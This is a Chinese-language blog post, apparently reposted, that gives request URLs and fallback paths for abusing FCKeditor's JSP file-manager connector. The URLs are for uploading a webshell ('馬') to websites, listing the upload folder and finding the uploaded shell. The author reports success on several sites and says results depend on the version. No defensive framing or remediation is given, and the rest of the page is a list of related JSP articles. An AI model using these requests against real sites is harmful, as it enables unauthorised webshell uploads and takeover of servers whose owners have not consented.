FCKeditor的JSP版漏洞

原創 nov5mber 2018-09-13 02:20
 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

上傳馬所在目錄
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上傳shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有關係.並不是百分百成功. 測試成功幾個站.
不能通殺.很遺憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
如果以上地址不行可以試試
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
FCKeditor/_samples/
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

ASP、JSP、PHP 三種技術比較

lichenjing9 2019-02-23 14:06:52

Ajax

yi_sixian 2019-02-23 14:05:36

jsp的Include方式

曉竹 2019-02-23 13:35:55

什麼是jsp,爲會麼學習jsp,如何學習jsp

爪哇 2019-02-23 13:12:07

windowXP上的jsp環境設置

爪哇 2019-02-23 13:12:07

jsp分頁總結

624126837 2019-02-23 00:32:15

JSP/Servlet及相關技術詳解(三)

zmhot88 2019-02-23 00:02:57

能力工場--關於在JavaScript中使用EL表達式的問題

malijava 2019-02-22 23:38:09

jetty訪問jsp頁面出現( PWC6345: There is an error in invoking

小貝668 2019-02-22 23:32:15

JSP學習筆記(3)——域對象的屬性操作

殷巖泉 2019-02-22 23:27:51

JSP中include指令和include動作的區別

liyunhua258 2019-02-22 23:14:11

EL表達式

yaoyaomimi 2019-02-22 23:08:34

jsp連接數據庫

sunnyting902 2019-02-22 22:45:08

JSP中include指令和include動作區別詳解

xiwang_2010 2019-02-22 22:38:15

ecshop中fckeditor添加方法

汗侖爾 2019-02-22 23:11:54